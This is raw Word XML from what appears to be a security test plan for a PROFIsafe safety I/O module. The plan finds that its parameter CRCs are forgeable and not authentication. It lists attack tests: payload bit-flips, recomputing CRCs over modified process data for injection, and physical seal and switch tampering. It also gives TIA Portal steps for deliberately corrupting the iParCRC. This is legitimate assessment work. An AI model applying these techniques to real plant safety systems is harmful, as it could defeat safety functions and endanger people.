          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Plastic/metal sleeve seals on the </w:t>
      </w:r>
      <w:r w:rsidR="00756315" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Switch 192.168.0.91</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> housing (SRIO-11000/11001)</w:t>
      </w:r>
      <w:r w:rsidR="00B22D12" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>passive resistance only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57614F07" w14:textId="77777777" w:rsidR="00355D43"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63597285" w14:textId="66D2F824" w:rsidR="00355D43" w:rsidRPr="006D5B99" w:rsidRDefault="00355D43">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r w:rsidR="00AB44FC" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00FF72C0" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF72C0" w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="007C3336">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r w:rsidR="00AB44FC" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009C7993" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Same limitation for iParCRC/F_ParCRC. F_ParCRC is only 16-bit (a 2¹⁶ space, no forgery resistance); iParCRC is 32-bit but still non-cryptographic and recomputable from the public layout.</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF6169" w14:textId="7B4DB1EC" w:rsidR="002014CB" w:rsidRPr="006D5B99" w:rsidRDefault="002014CB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3</w:t>
      </w:r>
      <w:r w:rsidR="00AB44FC" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0002202F" w:rsidRPr="006D5B99">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sidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Switch 192.168.0.91</w:t>
      </w:r>
      <w:r w:rsidR="0002202F" w:rsidRPr="006D5B99">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6D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216434DD" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE21217" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC13A6F" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C17912" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124B7706" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5343A78B" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640B6D76" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EEC16E3" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2032510B" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6CA68A" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286DBC56" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476A0A78" w14:textId="77777777" w:rsidR="0002202F" w:rsidRPr="006D5B99" w:rsidRDefault="0002202F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B003CC"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6D5B99"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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7031406F"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C81D005"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0B1626A9"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BD5E8E0"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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42080B59" w14:textId="77777777" w:rsidR="0051309A"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Present a configuration with a wrong iParCRC / F_ParCRC; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="581021F7" w14:textId="4E698B0B" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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rejection (EC3, stays in Parametrization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DF3DB2A" w14:textId="1A1F7199" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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0F2BE3AE" w14:textId="56F4C79B" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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21CA42C9" w14:textId="206079EE"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CA2AAB" w:rsidRPr="006D5B9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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77A73DD3" w14:textId="2A439584" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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Bit-flip the payload leaving CRC stale </w:t>
            </w:r>
            <w:r w:rsidR="00096DED" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CRC mismatch </w:t>
            </w:r>
            <w:r w:rsidR="00096DED" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> passivation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65FBB07A" w14:textId="1DD88411" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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Effectiveness of the CRC countermeasure under fault</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="796F68C4" w14:textId="77777777" w:rsidR="003F5E54"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§5.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03AE16A9" w14:textId="04562FAB" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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PROFIsafe CRC theory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48A7F8CE" w14:textId="79E85ABA"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CA2AAB" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BFED928" w14:textId="2AD299D7" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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CRC over MODIFIED process data and inject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ADDA415" w14:textId="25FC8A05" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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intentional corruption undetected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="781963F3" w14:textId="404C2A75" w:rsidR="001742D7"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MITRE ATT&amp;CK for ICS T0836; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4483687F" w14:textId="037D46FF" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="154A6E37" w14:textId="77777777" w:rsidR="003B0E8D" w:rsidRPr="006D5B99"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6D5B99"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CA2AAB" w:rsidRPr="006D5B9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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C7861C" w14:textId="079C372E" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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F_ParCRC forgery feasibility</w:t>
            </w:r>
            <w:r w:rsidR="009216D9" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>analyse the 16-bit F_ParCRC / 32-bit iParCRC forgeability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C70C302" w14:textId="77BE60F1" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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parameter CRCs are not authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CF5D2B5" w14:textId="39E2787C" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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§4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DA13F52" w14:textId="25369D3D" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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CA2AAB" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E4E8537" w14:textId="600B80F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Physical tamper-resistance: remove seal, alter rotary </w:t>
            </w:r>
            <w:r w:rsidR="0033596C" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>switch</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, reboot;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="404846C8" w14:textId="1FE040AC" w:rsidR="00FE2A16"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 runtime change is ignored </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A51BA5" w14:textId="791DBB3B" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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 the next-boot address can be corrupted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37229343" w14:textId="304CC40F" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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G-3 (resistance-only physical protection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B836832" w14:textId="77777777" w:rsidR="006868A2"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 ISTG-PHY; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="447830CE" w14:textId="65F94DB0"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EDR 3.11 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51F522E8" w14:textId="1C1E9BC5" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99"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5432C892" w14:textId="77777777" w:rsidR="00CA2AAB" w:rsidRPr="006D5B99" w:rsidRDefault="00CA2AAB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350AF455" w14:textId="77777777" w:rsidR="00F607D0" w:rsidRPr="006D5B99" w:rsidRDefault="00F607D0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB3C4AB" w14:textId="0B2A8E84" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3</w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C5023" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8FCC64" w14:textId="1BA908EC" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="00C9536C" w:rsidP="0013230C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>TC-RQ002-01</w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Parameter-CRC Rejection (iParCRC / F_ParCRC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675EF02F" w14:textId="050818E9" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">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7D39179"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875E1FD" w14:textId="7A93EFAD" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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72BCE1C" w14:textId="460909E3" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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B73A1A" w:rsidRPr="006D5B99"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16A1DC56" w14:textId="6C78C51B" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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431FAEDA" w14:textId="1DE86368" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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validates the safety parameter set and rejects a configuration whose parameter integrity values do not match, remaining in the safe (parametrization) state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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9D84106"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a valid baseline configuration.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68434377" w14:textId="77777777" w:rsidR="00622ADE"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a configuration whose parameter integrity value is deliberately incorrect.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45D4A464" w14:textId="77802696" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Observe device state, diagnostics, and qualifiers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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5DB2A6A" w14:textId="10FE584F" w:rsidR="00622ADE"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mismatch triggers a configuration error, the device remains in the safe/</w:t>
            </w:r>
            <w:r w:rsidR="007C31D8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>parametrization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> state, qualifiers remain bad, and no operating handshake completes. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B374CDC" w14:textId="4076BA70" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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FAIL if a configuration with a mismatched integrity value is accepted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="395971AF" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376B0703" w14:textId="600D4A24" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Level 2</w:t>
      </w:r>
      <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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9B7092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9F835DA" w14:textId="63C34365" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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TC-RQ002-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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9949B4" w14:textId="34DC85AC" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="004B2D40" w:rsidP="00655E93">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pt-BR"/>
              </w:rPr>
              <w:t>PLC with TIA Portal, SRIO</w:t>
            </w:r>
            <w:r w:rsidR="008A1C04" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve">TIA laptop </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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12F0A253" w14:textId="734CFCB3" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00A27EB9" w:rsidP="00A27EB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Portal</w:t>
            </w:r>
            <w:r w:rsidR="007D70FB" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ifm-CRC-Tool </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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085DF6B"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 1. Baseline: parametrize a valid iPar set.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AD8F3F2" w14:textId="00F8ED45"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select AL400S &gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2013703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Properties &gt; Module parameters (e.g. Filter F-DI 1 = 10 ms).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24C4DE00"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Calculate the iParCRC:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F856EA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Right-click the module &gt; 'Start device tool' &gt; select 'ifm-CRC-Tool' &gt; Start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CF3EA65"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the ifm-CRC-Tool: compare the displayed parameter list against the TIA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2473EEB9"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configuration; if correct, check 'I have checked all device parameters.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E99F45F"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They are set correctly.' &gt; the tool computes F_iPar_CRC (hex) &gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="434086B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click 'Copy to clipboard'.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D7D597A"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the value into: Properties &gt; PROFIsafe &gt; F-Parameters &gt; F_iPar_CRC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CDE50DE" w14:textId="339474B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Compile and download: Project &gt; Compile &gt; Online &gt; Download</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27D153A7" w14:textId="41CAF57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device . Confirm the connection establishes successfully.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24830303"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NOW deliberately break it: in TIA, manually change ONE hex digit of</w:t>
            </w:r>
          </w:p>
